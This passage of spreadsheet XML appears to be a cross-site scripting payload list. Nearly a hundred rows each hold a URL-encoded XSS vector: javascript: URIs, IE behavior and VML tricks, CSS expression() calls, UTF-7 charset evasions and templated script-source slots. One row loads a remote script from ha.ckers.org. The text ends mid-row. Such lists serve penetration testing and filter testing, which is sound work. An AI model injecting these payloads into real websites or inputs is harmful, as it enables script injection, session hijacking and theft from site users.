        <v>1%3Cset%2Fxmlns%3D%60urn%3Aschemas-microsoft-com%3Atime%60%20style%3D%60beh%26%23x41vior%3Aurl%28%23default%23time2%29%60%20attributename%3D%60innerhtml%60%20to%3D%60%26lt%3Bimg%2Fsrc%3D%26quot%3Bx%26quot%3Bonerror%3Djavascript%3Aalert%281%29%26gt%3B%60%3E</v>
      </c>
    </row>
    <row r="1745">
      <c r="A1745" s="3" t="s">
        <v>382</v>
      </c>
      <c r="B1745" s="4" t="str">
        <f t="shared" si="1"/>
        <v>1%3Canimate%2Fxmlns%3Durn%3Aschemas-microsoft-com%3Atime%20style%3Dbehavior%3Aurl%28%23default%23time2%29%20attributename%3Dinnerhtml%20values%3D%26lt%3Bimg%2Fsrc%3D%26quot%3B.%26quot%3Bonerror%3Djavascript%3Aalert%281%29%26gt%3B%3E</v>
      </c>
    </row>
    <row r="1746">
      <c r="A1746" s="3" t="s">
        <v>383</v>
      </c>
      <c r="B1746" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvmlframe%20xmlns%3Durn%3Aschemas-microsoft-com%3Avml%20style%3Dbehavior%3Aurl%28%23default%23vml%29%3Bposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%20src%3D%25%28vml%29s%23xss%3E%3C%2Fvmlframe%3E</v>
      </c>
    </row>
    <row r="1747">
      <c r="A1747" s="3" t="s">
        <v>384</v>
      </c>
      <c r="B1747" s="4" t="str">
        <f t="shared" si="1"/>
        <v>1%3Ca%20href%3D%23%3E%3Cline%20xmlns%3Durn%3Aschemas-microsoft-com%3Avml%20style%3Dbehavior%3Aurl%28%23default%23vml%29%3Bposition%3Aabsolute%20href%3Djavascript%3Ajavascript%3Aalert%281%29%20strokecolor%3Dwhite%20strokeweight%3D1000px%20from%3D0%20to%3D1000%20%2F%3E%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1748">
      <c r="A1748" s="3" t="s">
        <v>385</v>
      </c>
      <c r="B1748" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20style%3D%22behavior%3Aurl%28%23default%23AnchorClick%29%3B%22%20folder%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3EXXX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1749">
      <c r="A1749" s="3" t="s">
        <v>386</v>
      </c>
      <c r="B1749" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cx%20style%3D%22behavior%3Aurl%28%25%28sct%29s%29%22%3E</v>
      </c>
    </row>
    <row r="1750">
      <c r="A1750" s="3" t="s">
        <v>387</v>
      </c>
      <c r="B1750" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxml%20id%3D%22xss%22%20src%3D%22%25%28htc%29s%22%3E%3C%2Fxml%3E%20%3Clabel%20dataformatas%3D%22html%22%20datasrc%3D%22%23xss%22%20datafld%3D%22payload%22%3E%3C%2Flabel%3E</v>
      </c>
    </row>
    <row r="1751">
      <c r="A1751" s="3" t="s">
        <v>388</v>
      </c>
      <c r="B1751" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cevent-source%20src%3D%22%25%28event%29s%22%20onload%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1752">
      <c r="A1752" s="3" t="s">
        <v>389</v>
      </c>
      <c r="B1752" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3Cevent-source%20src%3D%22data%3Aapplication%2Fx-dom-event-stream%2CEvent%3Aclick%250Adata%3AXXX%250A%250A%22%3E</v>
      </c>
    </row>
    <row r="1753">
      <c r="A1753" s="3" t="s">
        <v>390</v>
      </c>
      <c r="B1753" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3D%22x%22%3Ex%3C%2Fdiv%3E%20%3Cxml%3Anamespace%20prefix%3D%22t%22%3E%20%3Cimport%20namespace%3D%22t%22%20implementation%3D%22%23default%23time2%22%3E%20%3Ct%3Aset%20attributeName%3D%22innerHTML%22%20targetElement%3D%22x%22%20to%3D%22%26lt%3Bimg%26%2311%3Bsrc%3Dx%3Ax%26%2311%3Bonerror%26%2311%3B%3Djavascript%3Aalert%281%29%26gt%3B%22%3E</v>
      </c>
    </row>
    <row r="1754">
      <c r="A1754" s="3" t="s">
        <v>391</v>
      </c>
      <c r="B1754" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%25%28payload%29s%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1755">
      <c r="A1755" s="3" t="s">
        <v>392</v>
      </c>
      <c r="B1755" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%25%28jscript%29s%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1756">
      <c r="A1756" s="3" t="s">
        <v>393</v>
      </c>
      <c r="B1756" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20language%3D%27javascript%27%20src%3D%27%25%28jscript%29s%27%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1757">
      <c r="A1757" s="3" t="s">
        <v>394</v>
      </c>
      <c r="B1757" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1758">
      <c r="A1758" s="3" t="s">
        <v>395</v>
      </c>
      <c r="B1758" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1759">
      <c r="A1759" s="3" t="s">
        <v>396</v>
      </c>
      <c r="B1759" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Ajavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1760">
      <c r="A1760" s="3" t="s">
        <v>397</v>
      </c>
      <c r="B1760" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%60javascript%3Ajavascript%3Aalert%281%29%60%3E</v>
      </c>
    </row>
    <row r="1761">
      <c r="A1761" s="3" t="s">
        <v>398</v>
      </c>
      <c r="B1761" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%25%28jscript%29s%3F%3CB%3E</v>
      </c>
    </row>
    <row r="1762">
      <c r="A1762" s="3" t="s">
        <v>399</v>
      </c>
      <c r="B1762" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E%3C%2FFRAMESET%3E</v>
      </c>
    </row>
    <row r="1763">
      <c r="A1763" s="3" t="s">
        <v>400</v>
      </c>
      <c r="B1763" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1764">
      <c r="A1764" s="3" t="s">
        <v>401</v>
      </c>
      <c r="B1764" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Djavascript%3Ajavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1765">
      <c r="A1765" s="3" t="s">
        <v>1052</v>
      </c>
      <c r="B1765" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%20ascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1766">
      <c r="A1766" s="3" t="s">
        <v>403</v>
      </c>
      <c r="B1766" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20onload%21%23%24%25%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1767">
      <c r="A1767" s="3" t="s">
        <v>404</v>
      </c>
      <c r="B1767" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FSRC%3D%22%25%28jscript%29s%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1768">
      <c r="A1768" s="3" t="s">
        <v>405</v>
      </c>
      <c r="B1768" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3E%25%28payload%29s%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1769">
      <c r="A1769" s="3" t="s">
        <v>406</v>
      </c>
      <c r="B1769" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%22</v>
      </c>
    </row>
    <row r="1770">
      <c r="A1770" s="3" t="s">
        <v>407</v>
      </c>
      <c r="B1770" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%25%28scriptlet%29s%20%3C</v>
      </c>
    </row>
    <row r="1771">
      <c r="A1771" s="3" t="s">
        <v>408</v>
      </c>
      <c r="B1771" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1772">
      <c r="A1772" s="3" t="s">
        <v>409</v>
      </c>
      <c r="B1772" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20DYNSRC%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1773">
      <c r="A1773" s="3" t="s">
        <v>410</v>
      </c>
      <c r="B1773" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20LOWSRC%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1774">
      <c r="A1774" s="3" t="s">
        <v>411</v>
      </c>
      <c r="B1774" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBGSOUND%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1775">
      <c r="A1775" s="3" t="s">
        <v>412</v>
      </c>
      <c r="B1775" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBR%20SIZE%3D%22%26%7Bjavascript%3Aalert%281%29%7D%22%3E</v>
      </c>
    </row>
    <row r="1776">
      <c r="A1776" s="3" t="s">
        <v>413</v>
      </c>
      <c r="B1776" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLAYER%20SRC%3D%22%25%28scriptlet%29s%22%3E%3C%2FLAYER%3E</v>
      </c>
    </row>
    <row r="1777">
      <c r="A1777" s="3" t="s">
        <v>414</v>
      </c>
      <c r="B1777" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1778">
      <c r="A1778" s="3" t="s">
        <v>415</v>
      </c>
      <c r="B1778" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40import%27%25%28css%29s%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1779">
      <c r="A1779" s="3" t="s">
        <v>416</v>
      </c>
      <c r="B1779" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22Link%22%20Content%3D%22%3C%25%28css%29s%3E%3B%20REL%3Dstylesheet%22%3E</v>
      </c>
    </row>
    <row r="1780">
      <c r="A1780" s="3" t="s">
        <v>417</v>
      </c>
      <c r="B1780" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22behavior%3A%20url%28%25%28htc%29s%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1781">
      <c r="A1781" s="3" t="s">
        <v>418</v>
      </c>
      <c r="B1781" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3Eli%20%7Blist-style-image%3A%20url%28%22javascript%3Ajavascript%3Aalert%281%29%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS</v>
      </c>
    </row>
    <row r="1782">
      <c r="A1782" s="3" t="s">
        <v>419</v>
      </c>
      <c r="B1782" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Djavascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1783">
      <c r="A1783" s="3" t="s">
        <v>420</v>
      </c>
      <c r="B1783" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CMETA%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Ajavascript%3Aalert%281%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1784">
      <c r="A1784" s="3" t="s">
        <v>421</v>
      </c>
      <c r="B1784" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%22%3E%3C%2FIFRAME%3E</v>
      </c>
    </row>
    <row r="1785">
      <c r="A1785" s="3" t="s">
        <v>422</v>
      </c>
      <c r="B1785" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%20BACKGROUND%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1786">
      <c r="A1786" s="3" t="s">
        <v>423</v>
      </c>
      <c r="B1786" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CTABLE%3E%3CTD%20BACKGROUND%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1787">
      <c r="A1787" s="3" t="s">
        <v>424</v>
      </c>
      <c r="B1787" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22background-image%3A%20url%28javascript%3Ajavascript%3Aalert%281%29%29%22%3E</v>
      </c>
    </row>
    <row r="1788">
      <c r="A1788" s="3" t="s">
        <v>425</v>
      </c>
      <c r="B1788" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CDIV%20STYLE%3D%22width%3Aexpression%28javascript%3Aalert%281%29%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1789">
      <c r="A1789" s="3" t="s">
        <v>426</v>
      </c>
      <c r="B1789" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20STYLE%3D%22xss%3Aexpr%2F%2AXSS%2A%2Fession%28javascript%3Aalert%281%29%29%22%3E</v>
      </c>
    </row>
    <row r="1790">
      <c r="A1790" s="3" t="s">
        <v>427</v>
      </c>
      <c r="B1790" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22xss%3Aexpression%28javascript%3Aalert%281%29%29%22%3E</v>
      </c>
    </row>
    <row r="1791">
      <c r="A1791" s="3" t="s">
        <v>428</v>
      </c>
      <c r="B1791" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20TYPE%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1792">
      <c r="A1792" s="3" t="s">
        <v>429</v>
      </c>
      <c r="B1792" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E.XSS%7Bbackground-image%3Aurl%28%22javascript%3Ajavascript%3Aalert%281%29%22%29%3B%7D%3C%2FSTYLE%3E%3CA%20CLASS%3DXSS%3E%3C%2FA%3E</v>
      </c>
    </row>
    <row r="1793">
      <c r="A1793" s="3" t="s">
        <v>430</v>
      </c>
      <c r="B1793" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Ajavascript%3Aalert%281%29%22%29%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1794">
      <c r="A1794" s="3" t="s">
        <v>431</v>
      </c>
      <c r="B1794" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Bif%20gte%20IE%204%5D%3E%3CSCRIPT%3Ejavascript%3Aalert%281%29%3B%3C%2FSCRIPT%3E%3C%21%5Bendif%5D--%3E</v>
      </c>
    </row>
    <row r="1795">
      <c r="A1795" s="3" t="s">
        <v>432</v>
      </c>
      <c r="B1795" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBASE%20HREF%3D%22javascript%3Ajavascript%3Aalert%281%29%3B%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="1796">
      <c r="A1796" s="3" t="s">
        <v>433</v>
      </c>
      <c r="B1796" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20TYPE%3D%22text%2Fx-scriptlet%22%20DATA%3D%22%25%28scriptlet%29s%22%3E%3C%2FOBJECT%3E</v>
      </c>
    </row>
    <row r="1797">
      <c r="A1797" s="3" t="s">
        <v>434</v>
      </c>
      <c r="B1797" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20classid%3Dclsid%3Aae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name%3Durl%20value%3Djavascript%3Ajavascript%3Aalert%281%29%3E%3C%2FOBJECT%3E</v>
      </c>
    </row>
    <row r="1798">
      <c r="A1798" s="3" t="s">
        <v>435</v>
      </c>
      <c r="B1798" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHTML%20xmlns%3Axss%3E%3C%3Fimport%20namespace%3D%22xss%22%20implementation%3D%22%25%28htc%29s%22%3E%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E%3C%2FHTML%3E%22%22%22%2C%22XML%20namespace.%22%29%2C%28%22%22%22%3CXML%20ID%3D%22xss%22%3E%3CI%3E%3CB%3E%26lt%3BIMG%20SRC%3D%22javas%3C%21--%20--%3Ecript%3Ajavascript%3Aalert%281%29%22%26gt%3B%3C%2FB%3E%3C%2FI%3E%3C%2FXML%3E%3CSPAN%20DATASRC%3D%22%23xss%22%20DATAFLD%3D%22B%22%20DATAFORMATAS%3D%22HTML%22%3E%3C%2FSPAN%3E</v>
      </c>
    </row>
    <row r="1799">
      <c r="A1799" s="3" t="s">
        <v>436</v>
      </c>
      <c r="B1799" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHTML%3E%3CBODY%3E%3C%3Fxml%3Anamespace%20prefix%3D%22t%22%20ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E%3C%3Fimport%20namespace%3D%22t%22%20implementation%3D%22%23default%23time2%22%3E%3Ct%3Aset%20attributeName%3D%22innerHTML%22%20to%3D%22XSS%26lt%3BSCRIPT%20DEFER%26gt%3Bjavascript%3Aalert%281%29%26lt%3B%2FSCRIPT%26gt%3B%22%3E%3C%2FBODY%3E%3C%2FHTML%3E</v>
      </c>
    </row>
    <row r="1800">
      <c r="A1800" s="3" t="s">
        <v>437</v>
      </c>
      <c r="B1800" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%22%25%28jpg%29s%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1801">
      <c r="A1801" s="3" t="s">
        <v>438</v>
      </c>
      <c r="B1801" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHEAD%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT%3D%22text%2Fhtml%3B%20charset%3DUTF-7%22%3E%20%3C%2FHEAD%3E%2BADw-SCRIPT%2BAD4-%25%28payload%29s%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="1802">
      <c r="A1802" s="3" t="s">
        <v>439</v>
      </c>
      <c r="B1802" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%20id%3D%22test%22%20%2F%3E%3Cbutton%20form%3D%22test%22%20formaction%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3EX</v>
      </c>
    </row>
    <row r="1803">
      <c r="A1803" s="3" t="s">
        <v>440</v>
      </c>
      <c r="B1803" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onscroll%3Djavascript%3Aalert%281%29%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br%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="1804">
      <c r="A1804" s="3" t="s">
        <v>441</v>
      </c>
      <c r="B1804" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CP%20STYLE%3D%22behavior%3Aurl%28%27%23default%23time2%27%29%22%20end%3D%220%22%20onEnd%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1805">
      <c r="A1805" s="3" t="s">
        <v>415</v>
      </c>
      <c r="B1805" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40import%27%25%28css%29s%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1806">
      <c r="A1806" s="3" t="s">
        <v>442</v>
      </c>
      <c r="B1806" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3Ea%7Bbackground%3Aurl%28%27s1%27%20%27s2%29%7D%40import%20javascript%3Ajavascript%3Aalert%281%29%3B%27%29%3B%7D%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1807">
      <c r="A1807" s="3" t="s">
        <v>443</v>
      </c>
      <c r="B1807" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20charset%3D%20%22x-imap4-modified-utf7%22%26%26%3E%26%26%3Cscript%26%26%3Ejavascript%3Aalert%281%29%26%26%3B%26%26%3C%26%26%2Fscript%26%26%3E</v>
      </c>
    </row>
    <row r="1808">
      <c r="A1808" s="3" t="s">
        <v>444</v>
      </c>
      <c r="B1808" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20onreadystatechange%3Djavascript%3Ajavascript%3Aalert%281%29%3B%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1809">
      <c r="A1809" s="3" t="s">
        <v>445</v>
      </c>
      <c r="B1809" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20onreadystatechange%3Djavascript%3Ajavascript%3Aalert%281%29%3B%3E%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1810">
      <c r="A1810" s="3" t="s">
        <v>446</v>
      </c>
      <c r="B1810" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Chtml%3Ahtml%20xmlns%3Ahtml%3D%27http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%27%3E%3Chtml%3Ascript%3Ejavascript%3Aalert%281%29%3B%3C%2Fhtml%3Ascript%3E%3C%2Fhtml%3Ahtml%3E</v>
      </c>
    </row>
    <row r="1811">
      <c r="A1811" s="3" t="s">
        <v>447</v>
      </c>
      <c r="B1811" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20code%3D%25%28scriptlet%29s%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="1812">
      <c r="A1812" s="3" t="s">
        <v>448</v>
      </c>
      <c r="B1812" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20code%3Djavascript%3Ajavascript%3Aalert%281%29%3B%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="1813">
      <c r="A1813" s="3" t="s">
        <v>449</v>
      </c>
      <c r="B1813" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%25%28jscript%29s%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="1814">
      <c r="A1814" s="3" t="s">
        <v>450</v>
      </c>
      <c r="B1814" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onload%3Djavascript%3Ajavascript%3Aalert%281%29%3E%3C%2Fframeset%3E</v>
      </c>
    </row>
    <row r="1815">
      <c r="A1815" s="3" t="s">
        <v>451</v>
      </c>
      <c r="B1815" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20onerror%3Djavascript%3Ajavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1816">
      <c r="A1816" s="3" t="s">
        <v>452</v>
      </c>
      <c r="B1816" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20type%3D%22image%22%20src%3D%25%28scriptlet%29s%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="1817">
      <c r="A1817" s="3" t="s">
        <v>453</v>
      </c>
      <c r="B1817" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXML%20ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG%20SRC%3D%22javas%5D%5D%3C%21%5BCDATA%5Bcript%3Ajavascript%3Aalert%281%29%3B%22%3E%5D%5D%3C%2FC%3E%3CX%3E%3C%2Fxml%3E</v>
      </c>
    </row>
    <row r="1818">
      <c r="A1818" s="3" t="s">
        <v>454</v>
      </c>
      <c r="B1818" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%7Bjavascript%3Aalert%281%29%3B%7D%3B%3E</v>
      </c>
    </row>
    <row r="1819">
      <c r="A1819" s="3" t="s">
        <v>455</v>
      </c>
      <c r="B1819" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22jav%26%2365ascript%3Ajavascript%3Aalert%281%29%22%3Etest1%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1820">
      <c r="A1820" s="3" t="s">
        <v>456</v>
      </c>
      <c r="B1820" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22jav%26%2397ascript%3Ajavascript%3Aalert%281%29%22%3Etest1%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1821">
      <c r="A1821" s="3" t="s">
        <v>457</v>
      </c>
      <c r="B1821" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20width%3D500%20height%3D500%20code%3D%22data%3Atext%2Fhtml%2C%3Cscript%3E%25%28payload%29s%3C%2Fscript%3E%22%3E%3C%2Fembed%3E</v>
      </c>
    </row>
    <row r="1822">
      <c r="A1822" s="3" t="s">
        <v>458</v>
      </c>
      <c r="B1822" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20srcdoc%3D%22%26LT%3Biframe%26sol%3Bsrcdoc%3D%26amp%3Blt%3Bimg%26sol%3Bsrc%3D%26amp%3Bapos%3B%26amp%3Bapos%3Bonerror%3Djavascript%3Aalert%281%29%26amp%3Bgt%3B%3E%22%3E</v>
      </c>
    </row>
    <row r="1823">
      <c r="A1823" s="5" t="s">
        <v>459</v>
      </c>
      <c r="B1823" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B</v>
      </c>
    </row>
    <row r="1824">
      <c r="A1824" s="3" t="s">
        <v>460</v>
      </c>
      <c r="B1824" s="4" t="str">
        <f t="shared" si="1"/>
        <v>alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--</v>
      </c>
    </row>
    <row r="1825">
      <c r="A1825" s="3" t="s">
        <v>461</v>
      </c>
      <c r="B1825" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1826">
      <c r="A1826" s="5" t="s">
        <v>462</v>
      </c>
      <c r="B1826" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D</v>
      </c>
    </row>
    <row r="1827">
      <c r="A1827" s="3" t="s">
        <v>463</v>
      </c>
      <c r="B1827" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1828">
      <c r="A1828" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B1828" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1829">
      <c r="A1829" s="3" t="s">
        <v>465</v>
      </c>
      <c r="B1829" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="1830">
      <c r="A1830" s="3" t="s">
        <v>466</v>
      </c>
      <c r="B1830" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="1831">
      <c r="A1831" s="3" t="s">
        <v>467</v>
      </c>
      <c r="B1831" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%22XSS%22%29%3E</v>
      </c>
    </row>
    <row r="1832">
      <c r="A1832" s="3" t="s">
        <v>468</v>
      </c>
      <c r="B1832" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%60javascript%3Aalert%28%22RSnake%20says%2C%20%27XSS%27%22%29%60%3E</v>
      </c>
    </row>
    <row r="1833">
      <c r="A1833" s="3" t="s">
        <v>469</v>
      </c>
      <c r="B1833" s="4" t="str">
        <f t="shared" si="1"/>
